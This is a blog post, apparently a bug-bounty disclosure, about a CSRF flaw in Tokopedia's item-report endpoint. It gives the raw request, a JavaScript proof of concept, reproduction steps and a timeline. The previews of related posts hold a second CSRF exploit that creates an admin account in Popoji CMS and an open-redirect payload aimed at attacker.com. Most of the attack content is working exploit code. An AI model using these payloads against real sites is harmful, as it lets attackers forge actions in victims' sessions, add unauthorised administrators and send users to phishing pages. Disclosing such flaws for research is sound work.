Tokopedia - CSRF On Report Item

CSRF Issue On Tokopedia, 

List of bug on Tokopedia :
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-to-create-new-store-for.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-report-item.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-on.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-login.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-open-store.html
Hi,
saya menemukan CSRF di Laporkan barang

Pendahuluan
Bug ini untuk melaporkan barang dari toko lain dikarenakan tidak ada CSRF token dalam request

Vuln Request:

POST /ajax/product-e4.pl HTTP/1.1
Host: www.tokopedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 162
Origin: null
Cookie: <some cookie>
Connection: close

type=4&element_id=170328516&r_type=9&r_message=Seleernya+jahat%2C+aku+gadikasih+diskon%2C+padahal+beli+banyaaak+%3A(+&click_name=submit&action=event_dialog_report

Note : element_id adalah sebuah id dari barang

Poc Code:
<script>
      function getMe(){
        // retrieve page content
        var xhr = new XMLHttpRequest();

        // now execute the CSRF attack
        xhr.open("POST", "https://www.tokopedia.com/ajax/product-e4.pl", true);
        xhr.withCredentials="true";
        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhr.send('type=4&element_id=170328516&r_type=9&r_message=Seleernya+jahat%2C+aku+gadikasih+diskon%2C+padahal+beli+banyaaak+%3A(+&click_name=submit&action=event_dialog_report');
        }
</script>
<button onclick="getMe();">Let's Rock</button>

Step to reproduce,
- save to html
- eksekusi
- barang akan dilaporkan

Kenapa bug ini bisa terjadi ?
Karena tidak ada token dalam mengirimkan sebuah POST request untuk melaporkan barang

Jika membutuhkan video, saya upload di :
https://youtu.be/3P2b96v-GBc  (video sudah saya set pribadi)

Timeline: 
- 7 April 2017 => Reporting
- 10 May => Fixing & Ask Document
- Waiting Bounty ( Will be edited )

Comments

Post a Comment

Popular posts from this blog

Open Redirect On Codepolitan.com

Image
Open Redirect On Codepolitan.com Description :  Open redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. Impact : Force user go to untrusted website from codepolitan website Location of bug :  https://www.codepolitan.com/users/login?callback= Payload : http://attacker.com Reproduce : 1. Open https://www.cod...
Read more

Tokopedia - CSRF On Open Store

Image
CSRF Issue On Tokopedia,  List of bug on Tokopedia : - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-to-create-new-store-for.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-report-item.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-on.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-login.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-open-store.html Halo, Saya menemukan sebuah bug CSRF di tokopedia Pendahuluan bug ini bisa mengubah user picture di login seal Vuln Request: POST /ajax/shop/shop-status.pl?action=event_re_open HTTP/1.1 Host: www.tokopedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 33 Origin: null Cookie: Some Cookie Connection: close action=event_re_open&s_id=[id toko]...
Read more

Missing CSRF Token On Add Admin [Popoji CMS]

Image
Description: This is happen because when request add admin there's no CSRF token Step To Reproduce : <script>function getMe(){ // retrieve page content var xhr = new XMLHttpRequest(); // now execute the CSRF attack xhr.open("POST", "http://root/popoji/poadmin/ route.php?mod=user&act=addnew", true); xhr.withCredentials="true"; xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan dy21%40gmail.com&no_telp=083833232954&level=1'); } </script> <button onclick="getMe();">Let's Rock</button> 1. Save code to .html 2. upload them to host 3. execute it. Video :  https://www.youtube.com/watch?v=1FXXuSiB6jo Fix & Mitigation : give token when request sensitive action. Note: them give me permission to disclose it, and th...
Read more